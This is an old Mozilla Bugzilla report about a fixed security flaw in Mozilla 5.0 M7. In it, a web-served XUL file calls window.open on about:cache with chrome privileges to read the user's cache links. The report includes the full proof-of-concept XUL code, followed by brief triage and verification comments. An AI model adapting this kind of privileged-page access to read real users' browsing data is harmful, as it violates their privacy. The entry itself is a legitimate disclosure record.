Closed Bug 9806 Opened 26 years ago Closed 26 years ago

Reading user's cache using XUL and window.open()

Categories

(SeaMonkey :: General, defect, P3)

Product:
SeaMonkey
Component:
General
Platform:
x86
Windows 95
Type:
defect

Tracking

(Not tracked)

Status:
VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

References

Details

There is a security vulnerability in Mozilla 5.0 M7 Win95 (guess all platforms), which allows reading user's cache using XUL and window.open(). The code is: -----------------------------cache1.xul---------------------------------- <?xml version="1.0"?> <!DOCTYPE window> <xul:window xmlns:html="http://www.w3.org/TR/REC-html40" xmlns:xul ="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul" title = "Reading cache"> <html:script> <![CDATA[ var a=window.open("about:cache","a","chrome"); dump("Here are some links from your cache:\n"); for(i=0;i<10;i++) dump(a.document.links[i].href+"\n"); ]]> </html:script> <!-- <html:iframe type="content-primary" src="about:cache" /> --> <html:hr/> <html:h3> Look at the apprunner console to see some URLs in your cache. </html:h3> </xul:window> -------------------------------------------------------------
Status: NEW → ASSIGNED
QA Contact: leger → dshea
So how do you get this XUL to execute? Install on the user's system?
This XUL may be exectuted from the web - check http://www.nat.bg/~joro/mozilla/cache1.xul The web server must have defined the mime type text/xul for .xul files, that is why I did not post this url in my original post.
Target Milestone: M11
Blocks: 12633
Depends on: 11462
Status: ASSIGNED → RESOLVED
Closed: 26 years ago
Resolution: --- → FIXED
My fix for 11462 resolved this as well.
Status: RESOLVED → VERIFIED
Windows NT 1999120208 Comm JavaScript Error: illegal URL method about:cache
Product: Browser → Seamonkey
You need to log in before you can comment on or make changes to this bug.